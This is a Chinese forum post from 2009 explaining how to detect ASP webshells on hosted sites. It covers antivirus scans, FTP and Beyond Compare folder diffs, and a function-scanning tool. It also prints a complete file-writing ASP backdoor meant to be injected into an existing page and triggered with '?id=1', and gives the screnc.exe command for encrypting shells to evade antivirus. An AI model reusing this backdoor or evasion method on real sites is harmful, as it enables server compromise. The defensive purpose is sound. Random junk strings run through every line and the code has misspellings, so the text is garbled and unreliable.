TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 " y$ r: T" ^; S6 w3 Q
0 d; v7 X: V- W$ @! \2 f( x
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 9 D& X- {# D L3 `3 ~ A' i
9 A6 O$ Y4 m4 i7 K. p" x* f; P; K一.技巧1:杀毒软件查杀 " Z$ f, Z/ |5 S, |' D1 T
+ p6 E4 B) o$ F9 L, G6 K
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
# S; p2 u% T" {( q5 \" i
2 y* x5 t- M6 P! B- D; m利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 + m% o! A3 B- @$ q
d! J# b! f5 C二.技巧2:FTP客户端对比 # `- _* S9 s. e! }8 i
0 u+ _- p8 E9 \$ m0 S上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入:
& P) f6 E3 a; i: V7 I4 I; w: i" o) O
screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 # S- K9 W" T$ D2 L
5 O0 j3 I, ^6 T9 N( u
经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
% e& K' W5 R% p+ X" F: f# y
3 ?0 X) W, `1 |6 a等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
/ q/ z$ G R5 _$ o3 Z) c, |% x- k' b! b
盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 / |3 x% u: d3 j5 @% u
, t# A' d5 t$ n7 ], s
所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
- Z K5 n) E6 G9 N
! ~+ u2 W& y2 K6 w9 K3 S( K; l/ h这里以FlashFXP进行操作讲解。 % z$ l; R; }: i* ]- y
+ f2 ~1 o O$ Y! Q# L' M' m步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
# e9 i# q5 \" } }( x1 L, E5 y& m3 T$ C
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 ( h1 {2 j; {: h5 w" K+ b% t- f
3 g! \3 `9 [; C' p! M& T- Q我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
9 _4 s9 B3 H! M7 I; t( ^' i三.技巧3:用Beyond Compare 2进行对比 . ^; _1 Q9 C9 N+ o
/ D3 f/ T! u; O. l4 l上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
6 W- ?+ t, O% ^# V! q% I$ I& Q( _9 g4 ]6 f+ z( i: I' i
〈%
0 F; h( a4 B8 \# Y8 {: H" F/ R; {, T! z7 \3 [! ]
on error resume next # }7 U9 B, M. \8 X8 d
& z- x) H' u4 l
id=request("id") 3 f7 Z* L: X# T5 a
! ?) }( |4 T7 |- c( l8 s5 ~if request("id")=1 then
0 l0 E R+ p6 M5 Q' @9 e/ a j% N4 s7 F! M: O6 h
testfile=Request.form("name") & ?( c! }3 e1 G! x0 w/ G3 `: @
2 I$ H, | ?4 }; A' X' w* W
msg=Request.form("message") 6 n' a+ m, {5 ?" l% G5 q
& Z8 U0 `* a& n. Q O
set fs=server.CreatObject("scripting.filesystemobject")
& p9 Y& i; c8 ^8 \- q7 o( h' V. M' B, T! \
set thisfile=fs.openTestFile(testfile,8,True,0)
! P# L, {5 f- ~- c9 J+ L& Q" @5 F1 R& \% g8 t- M9 `$ [- r8 ?! E0 [
thisfile.Writeline(""&msg&"")
% t' R' `* \& H Z/ X0 r
; J/ [" u' Y+ t& rthisfile.close ( s8 n! k- K( B1 J
" R0 M1 W' U: a. m8 w7 s4 ~
set fs=nothing
6 I+ a8 W+ G0 b# {( v' `
8 t3 e( M# G6 h, W%〉
. n9 _8 b% f K- L' k& N* k2 r
* y( _' ~/ E+ Q〈from method="post" Action="保存"?id=1〉
( @3 V7 L; |& u$ m* G) }
' z- H3 a" _7 a7 S4 [" F〈input type="text" size="20" name="Name"
4 |/ m2 y: U1 N o" L, Q. L) `: l4 j* z# u& r
Value=〈%=server.mappath("XP.ASP")%〉〉
/ \# f) L; S% y. B, @+ g3 M8 K5 K4 r! Y2 A: [0 V) d9 t4 b
〈textarea name="Message" class=input〉
, h) h! [3 r$ z
X" \7 K: H$ q0 q) P7 M! y& y5 }/ O" K- `7 U8 Q5 Y
〈/textarea〉
# K, y5 l6 }2 s" Z4 t/ L
. g0 t1 W/ W5 e0 H. l( o, I〈input type="Submit" name="send" Value="生成" 4 V3 K# N$ P2 F' C8 T
' B4 A$ q( R, t tclass=input〉 + g. c/ R( e- P! n
! ]# L+ K, X/ N8 X* x. F
〈/from〉
8 K' Z- |& J) H. J2 l- \ n$ f+ |6 t* @" S5 y
〈%end if%〉 3 X+ ?0 b P0 T" b. T/ Z
* T: v1 n9 m& D- r* S3 @# B注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。 ; S( {( O# h2 q& d# p
& N+ G& H" |2 b7 N- U假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
( P# w0 f7 |: I1 k& L+ Y! K* I& D2 ]+ V
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 D1 N2 u1 X5 I$ L. I4 d& p% d
8 n# m q" `: g# dBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
: S& t" ~# n( p
9 P- Y7 T' Y% b, U7 y看我来利用它完成渗透性asp木马的查找。 # a/ z( j W7 @
- T0 r0 |( N" \ g) e* @& d1 f+ Z
步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
' L; T2 j) d$ l4 ?9 T, m5 l7 M' e/ |/ L$ V6 Y9 ~5 q) p
步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 ; @. C" p: s0 ^* ^0 n1 Y6 e4 d
8 O( p* F6 g! [步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! ' X4 ?2 Q! a$ G$ p& b" m: b+ F6 ?. W
* n! \9 x2 D0 U/ _( [
7 U' y L8 S [' ^四.技巧4:利用组件性能找asp木马
. n6 J% r; ^. K6 M
3 J3 D2 ]7 y; g& _- Z# `8 u3 ?! S上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。 7 ^" s" H0 i2 }; m7 D3 F
. |; r% a+ x0 |: J) y u/ P
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 & W D) ^# ^) S7 h5 B1 P8 i
% [$ j/ T/ c& Y0 k1 ]) l% \; q
它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 - ?2 p5 M! n4 M
& T$ {% a( J5 N
使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
% C+ B! W0 X# b6 P
' Q3 H2 N+ j4 B f [8 a; \0 p一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。
* f7 |& u% F+ Y& d; s( H+ I' f4 _1 }5 d; O
大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主